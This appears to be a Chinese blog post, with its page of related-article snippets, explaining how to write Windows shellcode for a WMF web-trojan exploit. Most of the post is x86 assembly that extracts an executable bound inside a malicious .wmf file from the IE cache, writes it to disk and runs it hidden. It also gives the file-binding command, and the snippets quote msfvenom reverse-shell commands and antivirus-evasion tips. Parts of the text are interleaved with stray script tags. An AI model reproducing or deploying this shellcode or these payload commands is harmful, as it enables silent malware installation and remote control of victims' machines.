能够生成木马的ShellCode

最新推荐文章于 2023-12-13 13:46:09 发布
最新推荐文章于 2023-12-13 13:46:09 发布
阅读量2k 收藏
点赞数
文章标签: byte internet 汇编 exe windows api
最近一个朋友在WMF漏洞利用的ShellCode编写上遇到了麻烦:他需要编写的ShellCode功能是这样的:将绑定在.wmf文件中的.exe文件提取、生成并自动执行。经过一整天的努力这个问题基本部分解决了,但仍然存在一点疑惑,正好写下本文和大家讨论。
基础知识
讨论ShellCode之前,需要掌握两个基础知识:
1 .exe文件已经绑定到了.wmf文件中。怎么绑定呢?通过copy命令:"copy /b old.wmf+aa.exe new.wmf"即可完成,大家可以马上试试。
2 、 绑定木马之后的.wmf其实是与html文件一起作为网页木马来应用的。因此,用户通过IE打开畸形的new.wmf文件之前,会先将该文件连同html 文件一起下载到系统的IE临时文件夹TIFTemporary Internet Files)中。TIF是个隐藏文件夹,位于"Documents and Settings/Administrator/Local "显示所有文件和文件夹",然后进入该目à"隐藏文件和文件夹"à <script type="text/javascript"> </script> "查看"à"文件夹选项"àSettings" 下。为了便于理解,大家可先设置"工具" 录查看。TIF目录下可以看到很多文件,但实际上它们都只是真正文件的连接而已。真正的IE临时文件位于"TIF/Content.IE5"下,本例中的 new.wmf,位于本机的"Temporary Internet Files/Content.IE5/83SB61Q9"目录中。注意,Content.IE5及其中的文件或文件夹只有从资源管理器中才能看到,每个文 件名都多了一个"[1]",如new[1].wmf
OK,有了基础知识,接下来我们看看ShellCode的设计思路。
ShellCode设计思路
做任何事情之前整理好思路都很重要,本文要求的ShellCode设计思路大致如下:
1、 查找ShellCode可用到的各API函数地址。
2、 找到临时文件new[1].wmf的绝对路径,通过CreateFileA函数打开该文件,并创建文件aa.exe
3、 通过SetFilePointer函数让new[1].wmf <script type="text/javascript"> </script> 文件指针指向aa.exe文件数据开始的地方,即指向"MZ"
4、 循环从new[1].wmf中读取数据写入aa.exe
5、 执行生成的aa.exe
过程并不复杂,关键是细心,接下来大家看看汇编实现,在Windows 2000 SP4+VC6下编译通过。
汇编实现及待改进的问题
1API函数地址。最好在画流程图的时候就确定有哪些API函数会用到,并进行合理的内存规划.
其中,GetProcAddress这个函数地址最重要,查找代码已经多次介绍了,大家可以参考。其余函数查找的部分代码如下:
mov [ebp+2Ch], eax //GetProcAddress

//查找GetTempPathA地址
mov dword ptr [ebp], 'TteG'
mov dword ptr [ebp + 4], 'Ppme'
mov dword ptr [ebp + 8], 'Ahta'
mov byte ptr [ebp + 0xc], 0
push ebp //函数名地址作为参数压入栈(下同)
push ebx //Kernel32.dll地址(下同)
call [ebp+2Ch] //函数返回后eax就是GetTempPathA的地址
mov dword ptr[ebp+28h], eax //保存函数地址(下同)

//CreateFileA地址
mov dword ptr [ebp], 'aerC'
mov dword ptr [ebp + 4], 'iFet'
mov dword <script type="text/javascript"> </script> ptr [ebp + 8], 'Ael'
push ebp
push ebx
call [ebp+2Ch] //函数返回后eax就是CreateFileA的地址
mov dword ptr[ebp+24h], eax

//SetFilePointer地址
mov dword ptr [ebp], 'FteS'
mov dword ptr [ebp + 4], 'Peli'
mov dword ptr [ebp + 8], 'tnio'
mov dword ptr [ebp + 0xC], 're'
push ebp
push ebx
call [ebp+2Ch] //函数返回后eax就是SetFilePointer的地址
mov dword ptr[ebp+20h], eax

//查找ReadFileWriteFile函数地址
mov dword ptr [ebp], 'daeR'
mov dword ptr [ebp + 4], 'eliF'
mov byte ptr [ebp + 8], 0
push ebp
push ebx
call [ebp+2Ch] //函数返回后eax就是ReadFile的地址
mov dword ptr[ebp+1Ch], eax

//ReadFileWriteFile地址
mov dword ptr [ebp], ' <script type="text/javascript"> </script> daeR'
mov dword ptr [ebp + 4], 'eliF'
mov byte ptr [ebp + 8], 0
push ebp
push ebx
call [ebp+2Ch] //函数返回后eax就是ReadFile的地址
mov dword ptr[ebp+1Ch], eax
mov dword ptr [ebp], 'tirW'
mov dword ptr [ebp + 4], 'liFe'
mov word ptr [ebp + 8], 'e'
push ebp
push ebx
call [ebp+2Ch] //函数返回后eax就是WriteFile的地址
mov dword ptr[ebp+18h], eax

//WinExec地址
mov dword ptr [ebp], 'EniW'
mov dword ptr [ebp + 4], 'cex'
push ebp
push ebx
call [ebp+2Ch] //函数返回后eax就是WinExec的地址
mov dword ptr[ebp+14h], eax

//CloseHandle地址
mov dword ptr [ebp], 'solC'
mov dword ptr [ebp + 4], 'naHe'
mov dword ptr [ebp + 8], 'eld'
push ebp
push <script type="text/javascript"> </script> ebx
call [ebp+2Ch] //函数返回后eax就是CloseHandle的地址
mov dword ptr[ebp+38h], eax

//ExitThread地址
mov dword ptr [ebp], 'tixE'
mov dword ptr [ebp + 4], 'erhT'
mov dword ptr [ebp + 8], 'da'
push ebp
push ebx
call [ebp+2Ch] //函数返回后eax就是ExitThread的地址
mov dword ptr[ebp+3Ch], eax

2、找到临时文件new[1].wmf的绝对路径,通过CreateFileA函数打开该文件,通过GetTempPathA函数可找到系统临时文件夹、按照前面的基础知识,我们可以进一步找new[1].wmf的绝对路径。部分代码如下:
//留出空间以备将来存放长的数据
sub esp, 0x800
mov esi, esp
add esi, 4
sub esp,0x100
mov ebx,esp
add ebx,4

//调用GetTempPathA,获取系统临时文件夹
push ebx
push 64h
call dword ptr[ebp + 28h]
xor ecx,ecx
xor ecx,ecx
comp:
inc ecx
cmp byte ptr[ebx+ecx], 0x00
jnz comp

dec ecx
//将路径中的"temp" <script type="text/javascript"> </script> 替换为"temporary Internet Files/Content.IE5/83SB61Q9/new[1].wmf"
mov dword ptr[ebx+ecx],'raro'
mov dword ptr[ebx+ecx+4],'nI y'
mov dword ptr[ebx+ecx+8],'nret'
mov dword ptr[ebx+ecx+12],'F te'
mov dword ptr[ebx+ecx+16],'seli'
mov byte ptr[ebx+ecx+20], 0x5c // '/'
mov dword ptr[ebx+ecx+21], 'tnoC'
mov dword ptr[ebx+ecx+25], '.tne'
mov dword ptr[ebx+ecx+29], '55EI'
mov byte ptr[ebx+ecx+32], 0x5c //'/'
mov dword ptr[ebx+ecx+33], 'BS38'
mov dword ptr[ebx+ecx+37], '9Q16'
mov byte ptr[ebx+ecx+41], 0x5c
mov dword ptr[ebx+ecx+42], '[wen' //new[1].wmf
mov dword ptr[ebx+ecx+46], 'w.]1'
mov dword ptr[ebx+ecx+50], 'fm'

//以读的方式打开new[1].wmf
push 0
push 0x80 //FILE_ATTRIBUTE_NORMAL
push 3 //OPEN_EXISTING
push 0
push 3 //FILE_SHARE_READ | FILE_SHARE_WRITE
push 0x80000000 //GENERIC_READ
push ebx
call dword ptr[ebp + 24h] //CreateFileA
cmp eax, 0
jle gameover //-1则结束
<script type="text/javascript"> </script> mov dword ptr[ebp + 30h], eax //保存wmf文件句柄

//创建可执行文件c:/aa.exe
mov dword ptr[ebp], 0x615c3a63
mov dword ptr[ebp + 4], 'xe.a'
mov dword ptr[ebp + 8], 'e'
push 0
push 0 //FILE_ATTRIBUTE_NORMAL
push 2 //Create_ALWAYS
push 0
push 0
push 0x40000000 //GENERIC_WRITE
push ebp
call dword ptr[ebp + 24h] //CreateFileA
cmp eax, 0
jle gameover
mov dword ptr[ebp + 34h], eax //保存exe文件句柄

3、通过SetFilePointer函数让new[1].wmf文件指针指向aa.exe文件数据开始的地方。部分代码如下:
//SetFilePointer设置文件偏移(exe文件位置)
push 0
push 0
push 0x527D //exe文件数据开始处:21119
mov eax, dword ptr[ebp + 30h] //wmf文件句柄
push eax
call dword ptr[ebp + 20h] //SetFilePointer

4、循环从new[1].wmf中读取数据写入aa.exe。部分代码如下:
mov dword ptr[ebp + 40h], 0 //保存每次实际读取的数据
mov dword ptr[ebp + 44h], 0 //保存每次实际写入的数据 <script type="text/javascript"> </script>
Read_Write_exe:
push 0
lea eax, dword ptr[ebp + 40h]
push eax
push 0x400 //每次预定读取1024字节
push esi //存放每次读取后数据的缓冲区地址
push dword ptr[ebp + 30h] //wmf文件句柄
call dword ptr[ebp+1Ch] //ReadFile

push 0
lea eax, dword ptr[ebp + 44h] //每次实际写入的数据字节数地址
push eax
push dword ptr[ebp + 40h]
push esi
push dword ptr[ebp + 34h] //exe文件句柄
call dword ptr[ebp+18h] //WriteFile

//cmp byte ptr[ebx],1
//jz Read_Write_exe
cmp dword ptr[ebp + 44h], 0x400 //判断是否读写完毕
jge Read_Write_exe

//关闭wmfexe文件句柄
push dword ptr[ebp+30h]
call dword ptr[ebp + 38h] //CloseHandle
push dword ptr[ebp+34h]
call dword ptr[ebp + 38h] //CloseHandle

5、执行生成的aa.exe,并退出线程。部分代码如下:
push 0 //SW_HIDE
push ebp
call dword ptr[ebp + 14h] //Winexec
gameover:
//ExitThread
push 0
call dword ptr[ebp + 3Ch] //ExitThread <script type="text/javascript"> </script>

汇编代码就是这样,大家按照前面多期文章介绍的方法可以完成ShellCode的提取,这里就不罗嗦了。
最后还有一个问题,"Content.IE5/83SB61Q9"目录中的"83SB61Q9"是随机的,不同的机器有所区别。因此通用性问题是需要解决的,本文的侧重点是介绍实现的思路。
小结
本 文介绍了提取绑定在文件中(如.wmf)木马文件的ShellCode编写方法。提取绑定木马的ShellCode主要目的是以较短的ShellCode 完成较复杂的功能,实际的复杂功能都是由木马文件来完成。它和传统Down&execShellCode相比,也很容易实现访问网络时突破防火 墙。  
iiprogram
关注
shellcode 上线转内存马
文公子的博客
10-12 319
shellcode 上线转内存马 1、使用msf制作shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.109.135 LPORT=1234 -f exe > /home/kali/Desktop/1.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch select
termux怎么生成木马_metasploit 生成木马常用命令
weixin_39926040的博客
12-21 1226
生成反弹木马:1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe //exe文件2. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > ap...
shellcode基础-Linux木马构造流程
最新发布
weixin_43988746的博客
12-13 978
编写Linux木马流程
编写word木马shellcode
大浪淘沙的专栏
03-24 2131
编写Word木马ShellCode作者:Azrael  来源:网鹰工作室  日期:2008-01-08 15:24:00曹军分析了导致去年“万珍”病毒的Word 2000溢出漏洞细节,但并没涉及漏洞的具体利用;第4期文章中,黑防讨论了生成WMF木马ShellCode的设计与实现。由于自身的特点,Word木马的设计与前者有较大的区别,下面由我对此进行一下分析。预备知识讨论ShellCode之前,
使用C/Delphi编写ShellCode
冷风
03-06 2771
这里说的ShellCode指的是一段x86机器码,无需重定位,在内存任何位置都可以执行的代码.使用C/Delphi编写代码也是由其编译器特性决定的。一说起ShellCode,一般人都想到MASM/TASM/FASM/NASM这类汇编语言编译器,但是,汇编语言写ShellCode维护起来总是很麻烦,肯定不如高级语言维护起来方便,尤其是大型的工程,例如PE Virus/Packer这样的工程。Shel
一个简单用来生成shellcode的类
azraelxuemo的博客
01-26 192
前几天在生成shellcode的时候用的硬编码,后来自己写了个类,可以用来接收一些地址什么的动态生成 class SHELLCODE { public: int size; int now_point; BYTE* shellcode; SHELLCODE(int size); void append(BYTE payload); void append(WORD payload); void append(DWORD payload); void push(LONG payload);
Shellcode 藏在图片中
12-07
为了规避检测,研究者们开发了各种隐藏***code的技术,比如NOP滑板生成器、Shellcode隐写术等。这些技术可以将Shellcode嵌入到正常数据之中,使得它的存在不那么显眼,不易被发现。 3. Shellcode隐写术与NOP滑板 ...
msfvenom生成木马利用
zzlx123的博客
12-23 2287
一开始想着把自己的物理主机当作靶机来执行木马,奈何发现不能从kali拖拽文件,所以先处理了下Tools的问题。 在安装Tools的时候提示CD-ROM门锁定,如果有和我一样问题的朋友可以按照我的方法来解决。 0x00 关闭kali 0x01 点击编辑此虚拟机 0x02 将此处改为使用物理驱动器 0x03 再次开启虚拟机,等开启后选择安装Tools 0x04 他会自动进行安装,进入系统后打开文件...
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5304
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
一款开源的ShellCode生成引擎
11-29
1.本工具只支持x86 coff格式的文件 2.全局变量记得初始化,测试的时候发现有事全局变量没有初始化会获取不到 3.关闭MSVC的全局优化,开启全局优化时OBJ中的信息无法获取 4.不要在代码中使用c++一些特性,类似异常等,测试类时发现基本的类是可以满足的不要使用c++的一些库,切记
shellcode帮助工具,直接把exeshellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
shcode2exe:从Windows或Linux将Shellcode编译为exe文件
03-04
shcode2exeshellcodeexe) 从Windows或Linux将Shellcode编译为exe文件。 特征 可以接受shellcode blob或字符串(字符串格式\x5e\x31 ) 可以针对32位或64位Windows体系结构。 跨平台。 在Linux或Windows上均可使用。 在Linux上运行时不依赖Wine 经过测试可使用Python v3.3及更高版本 经过测试,可以在Windows 7(非SP1)及更高版本上运行 主要用于恶意软件分析,但也可以用于漏洞利用开发。 受启发。 依存关系 对于Linux,请通过软件包管理器安装上述依赖项。 $ sudo apt install nasm $ sudo apt install binutils 对于Windows,您可以从安装nasm。 对于链接器,可以通过安装获得ld.exe的64位版本。 作为替
揭开Shellcode的神秘面纱
04-30 608
对于初期接触网络安全的人来说,Shellcode是很神秘的东西,对于网络攻击过程中的嗅探信息、漏洞剖析都是可以理解的,但真正利用漏洞入侵时,通过把一段二进制码送入后并执行,就可以获得目标机器的控制权,之后的事情是属于爱好者学习技术,还是黑客的行为,就看攻击者的一念之差了。Shellcode就好象神秘的武器,安全防护变得如此不堪一击。Shellcode究竟是什么样的程序?是什么特殊代码?如何才能学会编写?我下面收集了几类常见的Shellcode,主要是学习使用。它其实也是一般的软件程序,主要是因为二进制码的“
c语言木马源码大全,木马编程 之超强服务... 附代码 原创.
weixin_30651409的博客
05-23 2130
该楼层疑似违规已被系统折叠隐藏此楼查看此楼}BOOL AddSvchostGroup(VOID){HKEY hkey;//其实是一个句柄.if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost",&hkey)!=ERROR_SUCCESS)return FALSE...
使用C编写shellcode
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
11-23 891
使用C编写shellcode 背景 有时候程序员们需要写一段独立于位置操作的代码,可当作一段数据写到其他进程或者网络中去。该类型代码在它诞生之初就被称为 shellcode,在软件利用中黑客们以此获取到shell权限。方法就是通过这样或那样的恶意手法使得这段代码得以执行,完成它的使命。当然了,该代 码仅能靠它自己,作者无法使用现 代软件开发的实践来推进shellcode的编写。
免杀学习-认识shellcode
willing-sir的博客
12-16 729
免杀学习-认识shellcode 接着暑假的学习继续更,这学期比较忙,学校里要过逆向考试,加上学生会加上新生班助,还要忙着研究小车做比赛作品,杂七杂八的事一大堆就没更。 这个学期正好学了点逆向的基础知识,那就借此机会学习一下免杀,也是内网渗透比较重要的一个东西,争取这个寒假搓个免杀马,玩一玩兄弟的电脑 什么是shellcode 这一大堆反斜杠加数字是一串msfvenom生成shellcod...
基本shellcode提取方法
沉寂的孤城
10-04 5345
转载请注明出处:http://blog.csdn.net/wangxiaolong_china   这里,我们将编写一个非常简单的shellcode,它的功能是得到一个命令行。我们将从该shellcode的C程序源码开始,逐步构造并提取shellcode。 该shellcode的C程序源码为: root@linux:~/pentest# cat shellcode.c #inclu
Shellcode学习之编写变形的shellcode[实战篇]
dongyewolong的专栏
07-27 1035
上次花了很多笔墨来说明一个变形的shellcode到底是什么原理,这一次的实战篇我们就来做一个简单的变形shellcode。由于篇幅的限制,这个变形的东西还是比较幼稚,但是它已经能够逃脱几乎所有按照shellcode特征来杀 “毒”的各类软件,在shellcode不限长度的时候,你甚至可以反复的使用这个加密的头部来进行变形。具体的内容,我们在下面慢慢说。 切入正题之前还是按照老传统先科普一下。s
msf生成shellcode
06-28
MSF生成shellcode是一种常见的渗透测试技术,可以用于获取目标系统的控制权。使用MSF生成shellcode需要掌握一定的技术知识和经验,包括了解目标系统的漏洞、了解不同类型的shellcode以及使用MSF生成工具等。通过合理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值